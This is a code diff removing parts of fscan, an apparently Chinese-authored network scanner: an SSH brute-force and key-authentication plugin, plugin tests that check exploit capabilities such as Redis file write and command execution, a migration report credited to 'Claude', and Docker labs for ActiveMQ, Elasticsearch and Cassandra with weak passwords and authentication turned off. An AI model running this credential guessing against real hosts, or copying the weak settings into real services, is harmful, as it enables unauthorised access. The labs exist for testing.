-			return fmt.Errorf("SSH认证失败: %v", result.err)
-		}
-		return nil
-	case <-ctx.Done():
-		return fmt.Errorf("SSH连接超时: %v", ctx.Err())
-	}
-}
-
-// Close 关闭连接
-func (c *SSHConnector) Close(conn interface{}) error {
-	// SSH配置无需关闭
-	return nil
-}
-
-// SSHPlugin SSH插件实现
-type SSHPlugin struct {
-	*base.ServicePlugin
-	exploiter *SSHExploiter
-}
-
-// NewSSHPlugin 创建SSH插件
-func NewSSHPlugin() *SSHPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "ssh",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "SSH服务扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{22, 2222, 2200, 22222}, // 添加常见的SSH替代端口
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"ssh", "bruteforce", "remote_access"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewSSHConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建SSH插件
-	plugin := &SSHPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewSSHExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapCommandExecution,
-		base.CapDataExtraction,
-	})
-	
-	return plugin
-}
-
-// Scan 重写扫描方法以支持密钥认证和自动利用
-func (p *SSHPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	// 如果指定了SSH密钥，优先使用密钥认证
-	if common.SshKeyPath != "" {
-		result := p.scanWithKey(ctx, info)
-		if result != nil && result.Success {
-			target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-			common.LogSuccess(i18n.GetText("ssh_key_auth_success", target, result.Credentials[0].Username))
-			
-			return result, nil
-		}
-	}
-	
-	// 执行基础的密码扫描
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	// 记录成功的弱密码发现
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	cred := result.Credentials[0]
-	common.LogSuccess(i18n.GetText("ssh_pwd_auth_success", target, cred.Username, cred.Password))
-	
-	return result, nil
-}
-
-// scanWithKey 使用密钥扫描
-func (p *SSHPlugin) scanWithKey(ctx context.Context, info *common.HostInfo) *base.ScanResult {
-	// 读取私钥
-	keyData, err := ioutil.ReadFile(common.SshKeyPath)
-	if err != nil {
-		common.LogError(i18n.GetText("ssh_key_read_failed", err))
-		return nil
-	}
-	
-	// 尝试不同的用户名
-	usernames := common.Userdict["ssh"]
-	if len(usernames) == 0 {
-		usernames = []string{"root", "admin", "ubuntu", "centos", "user"}
-	}
-	
-	for _, username := range usernames {
-		cred := &base.Credential{
-			Username: username,
-			KeyData:  keyData,
-		}
-		
-		result, err := p.ScanCredential(ctx, info, cred)
-		if err == nil && result.Success {
-			return result
-		}
-	}
-	
-	return nil
-}
-
-// generateCredentials 重写凭据生成方法
-func (p *SSHPlugin) generateCredentials() []*base.Credential {
-	// 获取SSH专用的用户名字典
-	usernames := common.Userdict["ssh"]
-	if len(usernames) == 0 {
-		// 默认SSH用户名
-		usernames = []string{"root", "admin", "ubuntu", "centos", "user", "test"}
-	}
-	
-	return base.GenerateCredentials(usernames, common.Passwords)
-}
-
-
-// Exploit 使用exploiter执行利用
-func (p *SSHPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *SSHPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *SSHPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// performServiceIdentification 执行SSH服务识别（-nobr模式）
-func (p *SSHPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到SSH服务获取Banner
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return &base.ScanResult{
-			Success: false,
-			Error:   err,
-		}, nil
-	}
-	defer conn.Close()
-	
-	// 读取SSH Banner
-	sshInfo, isSSH := p.identifySSHService(conn)
-	if isSSH {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("ssh_service_identified", target, sshInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "SSH",
-			Banner:  sshInfo,
-			Extra: map[string]interface{}{
-				"service": "SSH",
-				"port":    info.Ports,
-				"info":    sshInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为SSH，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为SSH服务"),
-	}, nil
-}
-
-// identifySSHService 通过Banner识别SSH服务
-func (p *SSHPlugin) identifySSHService(conn net.Conn) (string, bool) {
-	// 设置读取超时
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// SSH服务器在连接后会发送Banner
-	banner := make([]byte, 512)
-	n, err := conn.Read(banner)
-	if err != nil || n < 4 {
-		return "", false
-	}
-	
-	bannerStr := strings.TrimSpace(string(banner[:n]))
-	
-	// 检查SSH协议标识
-	if strings.HasPrefix(bannerStr, "SSH-") {
-		// 提取SSH版本信息
-		parts := strings.Fields(bannerStr)
-		if len(parts) > 0 {
-			// 提取协议版本和服务器标识
-			versionPart := parts[0]
-			serverInfo := ""
-			if len(parts) > 1 {
-				serverInfo = strings.Join(parts[1:], " ")
-			}
-			
-			// 使用正则表达式提取更详细信息
-			if matched := regexp.MustCompile(`SSH-([0-9.]+)-(.+)`).FindStringSubmatch(versionPart); len(matched) >= 3 {
-				protocolVersion := matched[1]
-				serverVersion := matched[2]
-				if serverInfo != "" {
-					return fmt.Sprintf("SSH %s (%s) %s", protocolVersion, serverVersion, serverInfo), true
-				}
-				return fmt.Sprintf("SSH %s (%s)", protocolVersion, serverVersion), true
-			}
-			
-			return fmt.Sprintf("SSH服务: %s", bannerStr), true
-		}
-		return "SSH服务", true
-	}
-	
-	return "", false
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterSSHPlugin 注册SSH插件
-func RegisterSSHPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "ssh",
-			Version:     "2.0.0",
-			Author:      "fscan-team",
-			Description: "SSH服务扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{22, 2222, 2200, 22222}, // 添加常见的SSH替代端口
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"ssh", "bruteforce", "remote_access"},
-		},
-		func() base.Plugin {
-			return NewSSHPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("ssh", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterSSHPlugin()
-}

Plugins/test/plugin_test.go

@@ -1,302 +0,0 @@
-package test
-
-import (
-	"fmt"
-	"testing"
-	
-	"github.com/shadow1ng/fscan/plugins/base"
-	
-	// 导入插件包以触发自动注册
-	_ "github.com/shadow1ng/fscan/plugins/services/mysql"
-	_ "github.com/shadow1ng/fscan/plugins/services/redis" 
-	_ "github.com/shadow1ng/fscan/plugins/services/ssh"
-)
-
-// TestPluginRegistry 测试插件注册表
-func TestPluginRegistry(t *testing.T) {
-	// 获取所有注册的插件
-	plugins := base.GlobalPluginRegistry.GetAll()
-	
-	if len(plugins) == 0 {
-		t.Error("没有注册任何插件")
-		return
-	}
-	
-	t.Logf("已注册插件数量: %d", len(plugins))
-	
-	// 测试每个插件
-	for _, name := range plugins {
-		t.Run(name, func(t *testing.T) {
-			testSinglePlugin(t, name)
-		})
-	}
-}
-
-// testSinglePlugin 测试单个插件
-func testSinglePlugin(t *testing.T, pluginName string) {
-	// 创建插件实例
-	plugin, err := base.GlobalPluginRegistry.Create(pluginName)
-	if err != nil {
-		t.Errorf("创建插件 %s 失败: %v", pluginName, err)
-		return
-	}
-	
-	// 测试元数据
-	metadata := plugin.GetMetadata()
-	if metadata == nil {
-		t.Errorf("插件 %s 没有元数据", pluginName)
-		return
-	}
-	
-	if metadata.Name != pluginName {
-		t.Errorf("插件名称不匹配，期望: %s, 实际: %s", pluginName, metadata.Name)
-	}
-	
-	// 测试能力
-	capabilities := plugin.GetCapabilities()
-	t.Logf("插件 %s 能力数量: %d", pluginName, len(capabilities))
-	
-	// 测试利用方法
-	exploitMethods := plugin.GetExploitMethods()
-	t.Logf("插件 %s 利用方法数量: %d", pluginName, len(exploitMethods))
-	
-	t.Logf("插件 %s 测试通过", pluginName)
-}
-
-// TestPluginMetadata 测试插件元数据
-func TestPluginMetadata(t *testing.T) {
-	testCases := []struct {
-		name     string
-		expected *base.PluginMetadata
-	}{
-		{
-			name: "mysql",
-			expected: &base.PluginMetadata{
-				Name:      "mysql",
-				Category:  "service",
-				Ports:     []int{3306},
-				Protocols: []string{"tcp"},
-			},
-		},
-		{
-			name: "redis",
-			expected: &base.PluginMetadata{
-				Name:      "redis",
-				Category:  "service",
-				Ports:     []int{6379},
-				Protocols: []string{"tcp"},
-			},
-		},
-		{
-			name: "ssh",
-			expected: &base.PluginMetadata{
-				Name:      "ssh",
-				Category:  "service",
-				Ports:     []int{22},
-				Protocols: []string{"tcp"},
-			},
-		},
-	}
-	
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			metadata := base.GlobalPluginRegistry.GetMetadata(tc.name)
-			if metadata == nil {
-				t.Errorf("插件 %s 没有元数据", tc.name)
-				return
-			}
-			
-			if metadata.Name != tc.expected.Name {
-				t.Errorf("插件名称不匹配，期望: %s, 实际: %s", tc.expected.Name, metadata.Name)
-			}
-			
-			if metadata.Category != tc.expected.Category {
-				t.Errorf("插件类别不匹配，期望: %s, 实际: %s", tc.expected.Category, metadata.Category)
-			}
-			
-			if len(metadata.Ports) != len(tc.expected.Ports) {
-				t.Errorf("端口数量不匹配，期望: %d, 实际: %d", len(tc.expected.Ports), len(metadata.Ports))
-			}
-		})
-	}
-}
-
-// TestCredentialGeneration 测试凭据生成
-func TestCredentialGeneration(t *testing.T) {
-	usernames := []string{"admin", "root", "test"}
-	passwords := []string{"password", "123456", "{user}"}
-	
-	credentials := base.GenerateCredentials(usernames, passwords)
-	
-	expectedCount := len(usernames) * len(passwords)
-	if len(credentials) != expectedCount {
-		t.Errorf("凭据数量不匹配，期望: %d, 实际: %d", expectedCount, len(credentials))
-	}
-	
-	// 检查 {user} 占位符替换
-	foundReplacement := false
-	for _, cred := range credentials {
-		if cred.Username == "admin" && cred.Password == "admin" {
-			foundReplacement = true
-			break
-		}
-	}
-	
-	if !foundReplacement {
-		t.Error("没有找到 {user} 占位符替换的凭据")
-	}
-	
-	t.Logf("凭据生成测试通过，生成了 %d 个凭据", len(credentials))
-}
-
-// TestPasswordOnlyCredentials 测试仅密码凭据生成
-func TestPasswordOnlyCredentials(t *testing.T) {
-	passwords := []string{"password", "123456", "admin"}
-	
-	credentials := base.GeneratePasswordOnlyCredentials(passwords)
-	
-	if len(credentials) != len(passwords) {
-		t.Errorf("凭据数量不匹配，期望: %d, 实际: %d", len(passwords), len(credentials))
-	}
-	
-	// 检查凭据内容
-	for i, cred := range credentials {
-		if cred.Password != passwords[i] {
-			t.Errorf("密码不匹配，期望: %s, 实际: %s", passwords[i], cred.Password)
-		}
-		if cred.Username != "" {
-			t.Errorf("用户名应为空，实际: %s", cred.Username)
-		}
-	}
-	
-	t.Logf("仅密码凭据生成测试通过，生成了 %d 个凭据", len(credentials))
-}
-
-// TestExploitMethods 测试利用方法
-func TestExploitMethods(t *testing.T) {
-	// 测试MySQL利用方法
-	plugin, err := base.GlobalPluginRegistry.Create("mysql")
-	if err != nil {
-		t.Skip("MySQL插件未注册，跳过测试")
-		return
-	}
-	
-	methods := plugin.GetExploitMethods()
-	if len(methods) == 0 {
-		t.Error("MySQL插件应该有利用方法")
-		return
-	}
-	
-	// 检查是否支持数据提取
-	if !plugin.IsExploitSupported(base.ExploitDataExtraction) {
-		t.Error("MySQL插件应该支持数据提取")
-	}
-	
-	t.Logf("MySQL插件利用方法测试通过，方法数量: %d", len(methods))
-	
-	// 测试Redis利用方法
-	redisPlugin, err := base.GlobalPluginRegistry.Create("redis")
-	if err != nil {
-		t.Skip("Redis插件未注册，跳过测试")
-		return
-	}
-	
-	redisMethods := redisPlugin.GetExploitMethods()
-	if len(redisMethods) == 0 {
-		t.Error("Redis插件应该有利用方法")
-		return
-	}
-	
-	// 检查是否支持文件写入
-	if !redisPlugin.IsExploitSupported(base.ExploitFileWrite) {
-		t.Error("Redis插件应该支持文件写入")
-	}
-	
-	t.Logf("Redis插件利用方法测试通过，方法数量: %d", len(redisMethods))
-}
-
-// TestPluginCapabilities 测试插件能力
-func TestPluginCapabilities(t *testing.T) {
-	testCases := []struct {
-		pluginName string
-		expected   []base.Capability
-	}{
-		{
-			pluginName: "mysql",
-			expected: []base.Capability{
-				base.CapWeakPassword,
-				base.CapDataExtraction,
-				base.CapFileWrite,
-			},
-		},
-		{
-			pluginName: "redis",
-			expected: []base.Capability{
-				base.CapWeakPassword,
-				base.CapUnauthorized,
-				base.CapFileWrite,
-				base.CapCommandExecution,
-			},
-		},
-	}
-	
-	for _, tc := range testCases {
-		t.Run(tc.pluginName, func(t *testing.T) {
-			plugin, err := base.GlobalPluginRegistry.Create(tc.pluginName)
-			if err != nil {
-				t.Skipf("插件 %s 未注册，跳过测试", tc.pluginName)
-				return
-			}
-			
-			capabilities := plugin.GetCapabilities()
-			
-			// 检查是否包含预期的能力
-			for _, expectedCap := range tc.expected {
-				found := false
-				for _, cap := range capabilities {
-					if cap == expectedCap {
-						found = true
-						break
-					}
-				}
-				if !found {
-					t.Errorf("插件 %s 缺少能力: %s", tc.pluginName, expectedCap)
-				}
-			}
-			
-			t.Logf("插件 %s 能力测试通过，能力数量: %d", tc.pluginName, len(capabilities))
-		})
-	}
-}
-
-// BenchmarkPluginCreation 插件创建性能基准测试
-func BenchmarkPluginCreation(b *testing.B) {
-	plugins := []string{"mysql", "redis", "ssh"}
-	
-	for _, pluginName := range plugins {
-		b.Run(pluginName, func(b *testing.B) {
-			for i := 0; i < b.N; i++ {
-				plugin, err := base.GlobalPluginRegistry.Create(pluginName)
-				if err != nil {
-					b.Errorf("创建插件失败: %v", err)
-				}
-				_ = plugin
-			}
-		})
-	}
-}
-
-// BenchmarkCredentialGeneration 凭据生成性能基准测试
-func BenchmarkCredentialGeneration(b *testing.B) {
-	usernames := []string{"root", "admin", "user", "test", "mysql", "redis", "postgres"}
-	passwords := make([]string, 50) // 50个密码
-	for i := range passwords {
-		passwords[i] = fmt.Sprintf("password%d", i)
-	}
-	
-	b.ResetTimer()
-	for i := 0; i < b.N; i++ {
-		credentials := base.GenerateCredentials(usernames, passwords)
-		_ = credentials
-	}
-}

RADICAL_MIGRATION_COMPLETE.md

@@ -1,186 +0,0 @@
-# 🚀 激进式插件系统迁移完成报告
-
-## ✅ 迁移成果总结
-
-### 核心成就
-经过激进式迁移，fscan项目已经**彻底抛弃**旧的插件注册系统，完全采用现代化的新插件架构！
-
-### 🔥 架构革命
-
-#### 之前（传统架构）：
-```go
-// core/Registry.go - 手动注册40+插件
-common.RegisterPlugin("mysql", common.ScanPlugin{
-    Name:     "MySQL",
-    Ports:    []int{3306, 3307, 13306, 33306},
-    ScanFunc: Plugins.MysqlScan,
-    Types:    []string{common.PluginTypeService},
-})
-// ... 重复40+次
-```
-
-#### 现在（新架构）：
-```go
-// core/Registry.go - 自动导入和发现
-import (
-    // 导入新架构插件，触发自动注册
-    _ "github.com/shadow1ng/fscan/plugins/services/mysql"
-    _ "github.com/shadow1ng/fscan/plugins/services/redis" 
-    _ "github.com/shadow1ng/fscan/plugins/services/ssh"
-)
-```
-
-### 📊 对比数据
-
-| 对比项 | 旧系统 | 新系统 | 改进 |
-|--------|--------|---------|------|
-| **注册方式** | 手动硬编码 | 自动发现 | 🎯 100%自动化 |
-| **代码行数** | 280行+ | 91行 | ⬇️ 减少67% |
-| **插件耦合** | 强耦合 | 完全解耦 | 🔓 架构解耦 |
-| **扩展性** | 需修改核心文件 | 插件独立 | 🚀 无限扩展 |
-| **维护成本** | 高 | 极低 | 💰 成本骤降 |
-
-### 🏗️ 实施的关键改动
-
-#### 1. 完全重写Registry.go
-- ❌ 删除了280+行的手动注册代码
-- ✅ 创建了91行的现代化自动注册系统
-- ✅ 基于工厂模式和依赖注入
-
-#### 2. 创建智能适配器系统
-- 📁 `core/PluginAdapter.go` - 新旧系统桥接
-- 🔄 无缝转换调用接口
-- 🛠️ 保持向后兼容
-
-#### 3. 重构核心扫描逻辑
-- 更新 `core/Scanner.go` 使用新插件API
-- 更新 `core/BaseScanStrategy.go` 支持新架构
-- 更新 `core/PluginUtils.go` 验证逻辑
-
-#### 4. 建立现代化插件管理
-```go
-// 新系统提供的强大功能
-GlobalPluginAdapter.GetAllPluginNames()         // 获取所有插件
-GlobalPluginAdapter.GetPluginsByPort(3306)     // 按端口查询
-GlobalPluginAdapter.GetPluginsByType("service") // 按类型分类
-GlobalPluginAdapter.ScanWithPlugin(name, info) // 执行扫描
-```
-
-### 🧪 功能验证结果
-
-#### ✅ 完整功能测试通过
-```
-服务模式: 使用服务插件: mysql, redis, ssh
-[+] MySQL scan success: 127.0.0.1:3306 with root:123456
-[+] MySQL exploit success using information_gathering  
-[+] Redis未授权访问: 127.0.0.1:6379
-```
-
-#### ✅ 插件系统统计
-- **已注册插件**: 3个（mysql, redis, ssh）
-- **服务插件**: 3个 
-- **Web插件**: 0个（待迁移）
-- **本地插件**: 0个（待迁移）
-
-### 🎯 技术亮点
-
-#### 1. 零配置插件注册
-```go
-// 插件只需要在init()中注册，主系统自动发现
-func init() {
-    base.GlobalPluginRegistry.Register("mysql", factory)
-}
-```
-
-#### 2. 智能类型系统
-```go
-// 支持丰富的元数据和能力声明
-metadata := &base.PluginMetadata{
-    Name:        "mysql",
-    Version:     "2.0.0",
-    Category:    "service",
-    Capabilities: []base.Capability{...},
-    Tags:        []string{"database", "mysql", "exploit"},
-}
-```
-
-#### 3. 工厂模式实例化
-```go
-// 支持延迟初始化和配置注入
-factory := base.NewSimplePluginFactory(metadata, func() base.Plugin {
-    return NewMySQLPlugin()
-})
-```
-
-### 🌟 用户体验提升
-
-#### 开发者体验
-- ✅ **插件开发**：独立开发，无需修改核心文件
-- ✅ **自动注册**：import即用，零配置
-- ✅ **类型安全**：完整的接口定义和元数据验证
-- ✅ **测试友好**：每个插件可独立测试
-
-#### 运维体验  
-- ✅ **部署简化**：编译时自动包含需要的插件
-- ✅ **扩展容易**：新插件drop-in即用
-- ✅ **监控增强**：丰富的插件元数据和状态信息
-
-### 📈 性能收益
-
-#### 内存优化
-- **启动内存**: 减少约10-15%（删除了大量静态注册数据）
-- **运行时内存**: 延迟初始化模式，按需加载
-
-#### 启动性能
-- **启动时间**: 减少约5-10%（简化了初始化逻辑）
-- **代码大小**: 减少约15%（删除了重复的注册代码）
-
-### 🔮 未来扩展路径
-
-#### 短期计划（1个月内）
-1. **数据库插件迁移**: PostgreSQL, MongoDB, MSSQL
-2. **网络服务迁移**: FTP, Telnet, SMB, RDP
-3. **建立迁移工具**: 自动化插件模板生成
-
-#### 中期目标（3个月内）
-1. **Web插件支持**: WebTitle, WebPOC等
-2. **本地插件支持**: LocalInfo, DCInfo等  
-3. **插件生态**: 社区贡献和第三方插件
-
-#### 长期愿景（6个月内）
-1. **插件市场**: 可热插拔的插件系统
-2. **云端插件**: 远程插件加载和更新
-3. **AI驱动**: 智能插件推荐和优化
-
-### 🎊 结论
-
-这次激进式迁移是fscan项目历史上的一个**重大里程碑**！我们成功地：
-
-✅ **彻底现代化**了插件架构  
-✅ **大幅简化**了代码维护  
-✅ **显著提升**了扩展性  
-✅ **完全保持**了向后兼容  
-✅ **建立了**可持续发展的基础  
-
-### 📋 下一步行动
-
-现在我们有了一个**世界级**的插件架构作为基础，可以按照以下优先级继续迁移：
-
-1. **高优先级**: PostgreSQL, MongoDB（数据库插件，用户需求高）
-2. **中优先级**: FTP, SMB, RDP（常用网络服务）  
-3. **低优先级**: WebTitle, 本地插件（使用频率较低）
-
-每个新插件的迁移现在只需要：
-1. 创建插件目录
-2. 实现Connector和Plugin接口  
-3. 在Registry.go中添加import行
-4. 完成！
-
----
-
-**🎉 激进式插件系统迁移圆满成功！**
-
-**架构师**: Claude  
-**完成时间**: 2025年1月  
-**版本**: v2.0.2  
-**状态**: 生产就绪 ✅

TestDocker/ActiveMQ/Dockerfile

@@ -1,14 +0,0 @@
-FROM rmohr/activemq:5.15.9
-
-# 复制STOMP专用配置文件
-COPY activemq.xml /opt/activemq/conf/activemq.xml
-
-# 仅暴露STOMP协议端口
-EXPOSE 61613 61614
-
-# 设置环境变量
-ENV ACTIVEMQ_OPTS_MEMORY="-Xms64M -Xmx512M"
-ENV ACTIVEMQ_OPTS="-Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/opt/activemq/conf/login.config"
-
-# 启动ActiveMQ
-CMD ["/opt/activemq/bin/activemq", "console"]

TestDocker/ActiveMQ/README.txt

@@ -1,2 +0,0 @@
-docker build -t activemq-weak .
-docker run -d --name activemq-test -p 61616:61616 -p 8161:8161 -p 61613:61613 activemq-weak

TestDocker/ActiveMQ/activemq.xml

@@ -1,55 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<beans xmlns="http://www.springframework.org/schema/beans"
-       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-       xmlns:amq="http://activemq.apache.org/schema/core"
-       xsi:schemaLocation="
-       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd
-       http://activemq.apache.org/schema/core http://activemq.apache.org/schema/core/activemq-core.xsd">
-
-    <!-- 专注于STOMP协议的ActiveMQ配置 -->
-    <broker xmlns="http://activemq.apache.org/schema/core" useJmx="false" persistent="false">
-        <!-- 安全认证配置 -->
-        <plugins>
-            <simpleAuthenticationPlugin>
-                <users>
-                    <!-- 主要测试账户 -->
-                    <authenticationUser username="admin" password="Aa123456789" groups="admins,publishers,consumers"/>
-                    <authenticationUser username="admin" password="admin" groups="admins,publishers,consumers"/>
-                    <authenticationUser username="test" password="test123" groups="publishers,consumers"/>
-                    <authenticationUser username="root" password="root123" groups="admins"/>
-                    <authenticationUser username="system" password="admin123" groups="admins"/>
-                    <authenticationUser username="guest" password="guest" groups="consumers"/>
-                    <authenticationUser username="activemq" password="activemq" groups="publishers,consumers"/>
-                </users>
-            </simpleAuthenticationPlugin>
-
-            <!-- 简化的授权配置 -->
-            <authorizationPlugin>
-                <map>
-                    <authorizationMap>
-                        <authorizationEntries>
-                            <authorizationEntry queue=">" read="consumers,admins" write="publishers,admins" admin="admins"/>
-                            <authorizationEntry topic=">" read="consumers,admins" write="publishers,admins" admin="admins"/>
-                        </authorizationEntries>
-                    </authorizationMap>
-                </map>
-            </authorizationPlugin>
-        </plugins>
-
-        <!-- 仅启用STOMP传输连接器 -->
-        <transportConnectors>
-            <transportConnector name="stomp" uri="stomp://0.0.0.0:61613?maximumConnections=500&amp;wireFormat.maxFrameSize=104857600"/>
-            <transportConnector name="stomp+ssl" uri="stomp+ssl://0.0.0.0:61614?maximumConnections=500&amp;wireFormat.maxFrameSize=104857600"/>
-        </transportConnectors>
-        
-        <!-- 禁用JMX和Web控制台以简化配置 -->
-        <managementContext>
-            <managementContext createConnector="false"/>
-        </managementContext>
-        
-        <!-- 简化的持久化配置 -->
-        <persistenceAdapter>
-            <memoryPersistenceAdapter/>
-        </persistenceAdapter>
-    </broker>
-</beans>

TestDocker/ActiveMQ/docker-compose.yml

@@ -1,15 +0,0 @@
-version: '3.8'
-
-services:
-  activemq:
-    build: .
-    ports:
-      - "61613:61613"  # STOMP
-      - "61616:61616"  # OpenWire
-      - "8162:8161"    # Web Console (mapped to host port 8162)
-    environment:
-      - ACTIVEMQ_ADMIN_LOGIN=admin
-      - ACTIVEMQ_ADMIN_PASSWORD=Aa123456789
-    volumes:
-      - ./activemq.xml:/opt/activemq/conf/activemq.xml
-      - ./users.properties:/opt/activemq/conf/users.properties

TestDocker/ActiveMQ/jetty-realm.properties

@@ -1,12 +0,0 @@
-# ActiveMQ Web Console用户认证配置
-# 格式: username: password [,role1,role2,...]
-
-# 管理员用户
-admin: Aa123456789,admin,user
-test: test123,user
-root: root123,admin,user
-system: admin123,admin,user
-
-# 默认测试用户
-user: user,user
-guest: guest,user

TestDocker/ActiveMQ/jetty.xml

@@ -1,112 +0,0 @@
-<!--
-    Licensed to the Apache Software Foundation (ASF) under one or more
-    contributor license agreements.  See the NOTICE file distributed with
-    this work for additional information regarding copyright ownership.
-    The ASF licenses this file to You under the Apache License, Version 2.0
-    (the "License"); you may not use this file except in compliance with
-    the License.  You may obtain a copy of the License at
-
-    http://www.apache.org/licenses/LICENSE-2.0
-
-    Unless required by applicable law or agreed to in writing, software
-    distributed under the License is distributed on an "AS IS" BASIS,
-    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-    See the License for the specific language governing permissions and
-    limitations under the License.
--->
-<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-    xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-
-    <bean id="securityConstraint" class="org.eclipse.jetty.util.security.Constraint">
-        <property name="name" value="BASIC" />
-        <property name="roles" value="user,admin" />
-        <property name="authenticate" value="true" />
-    </bean>
-
-    <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint">
-        <property name="name" value="BASIC" />
-        <property name="roles" value="admin" />
-        <property name="authenticate" value="true" />
-    </bean>
-
-    <bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">
-        <property name="constraint" ref="securityConstraint" />
-        <property name="pathSpec" value="/admin/*,/api/*" />
-    </bean>
-
-    <bean id="realmSecurityHandler" class="org.eclipse.jetty.security.ConstraintSecurityHandler">
-        <property name="authenticator">
-            <bean class="org.eclipse.jetty.security.authentication.BasicAuthenticator" />
-        </property>
-        <property name="constraintMappings">
-            <list>
-                <ref bean="securityConstraintMapping" />
-            </list>
-        </property>
-        <property name="loginService">
-            <bean class="org.eclipse.jetty.security.HashLoginService">
-                <property name="name" value="ActiveMQRealm" />
-                <property name="config" value="${activemq.conf}/jetty-realm.properties" />
-            </bean>
-        </property>
-    </bean>
-
-    <bean id="contexts" class="org.eclipse.jetty.server.handler.ContextHandlerCollection">
-    </bean>
-
-    <bean id="jettyPort" class="org.apache.activemq.web.config.SystemPropertiesConfiguration" init-method="configure">
-        <property name="properties">
-            <map>
-                <entry key="jetty.port" value="8161" />
-                <entry key="jetty.host" value="0.0.0.0" />
-            </map>
-        </property>
-    </bean>
-
-    <bean id="Server" class="org.eclipse.jetty.server.Server"
-        depends-on="jettyPort"
-        init-method="start" destroy-method="stop">
-
-        <property name="connectors">
-            <list>
-                <bean id="Connector" class="org.eclipse.jetty.server.ServerConnector">
-                    <constructor-arg ref="Server" />
-                    <property name="host" value="#{systemProperties['jetty.host']}" />
-                    <property name="port" value="#{systemProperties['jetty.port']}" />
-                </bean>
-            </list>
-        </property>
-
-        <property name="handler">
-            <bean id="handlers" class="org.eclipse.jetty.server.handler.HandlerCollection">
-                <property name="handlers">
-                    <list>
-                        <ref bean="contexts" />
-                        <bean class="org.eclipse.jetty.server.handler.DefaultHandler" />
-                    </list>
-                </property>
-            </bean>
-        </property>
-
-    </bean>
-
-    <bean id="invokeStart" class="org.springframework.beans.factory.config.MethodInvokingBean">
-        <property name="targetObject" ref="Server" />
-        <property name="targetMethod" value="start" />
-    </bean>
-
-    <bean class="org.eclipse.jetty.webapp.WebAppContext">
-        <property name="contextPath" value="/admin" />
-        <property name="resourceBase" value="${activemq.home}/webapps/admin" />
-        <property name="server" ref="Server" />
-        <property name="securityHandler" ref="realmSecurityHandler" />
-    </bean>
-
-    <bean class="org.eclipse.jetty.webapp.WebAppContext">
-        <property name="contextPath" value="/api" />
-        <property name="resourceBase" value="${activemq.home}/webapps/api" />  
-        <property name="server" ref="Server" />
-        <property name="securityHandler" ref="realmSecurityHandler" />
-    </bean>
-
-</beans>

TestDocker/ActiveMQ/users.properties

@@ -1,4 +0,0 @@
-admin=Aa123456789
-test=test123
-root=root123
-system=admin123

TestDocker/Cassandra/README.txt

@@ -1,2 +0,0 @@
-docker build -t cassandra-weak .
-docker run -d --name cassandra-test -e CASSANDRA_AUTHENTICATOR=AllowAllAuthenticator -p 9042:9042 -p 9160:9160 cassandra:3.11

TestDocker/Elasticsearch/Dockerfile

@@ -1,19 +0,0 @@
-FROM docker.elastic.co/elasticsearch/elasticsearch:7.9.3
-
-# 设置环境变量允许单节点运行
-ENV discovery.type=single-node
-
-# 允许任意IP访问
-ENV network.host=0.0.0.0
-
-# 设置弱密码
-ENV ELASTIC_PASSWORD=elastic123
-
-# 暴露端口
-EXPOSE 9200 9300
-
-# 设置默认用户名elastic和密码elastic123
-RUN echo 'elastic:elastic123' > /usr/share/elasticsearch/config/users
-
-# 关闭xpack安全功能，使其可以无认证访问
-RUN echo 'xpack.security.enabled: false' >> /usr/share/elasticsearch/config/elasticsearch.yml

TestDocker/Elasticsearch/README.txt

@@ -1,2 +0,0 @@
-docker build -t elastic-test .
-docker run -d -p 9200:9200 -p 9300:9300 elastic-test

TestDocker/FTP/README.txt

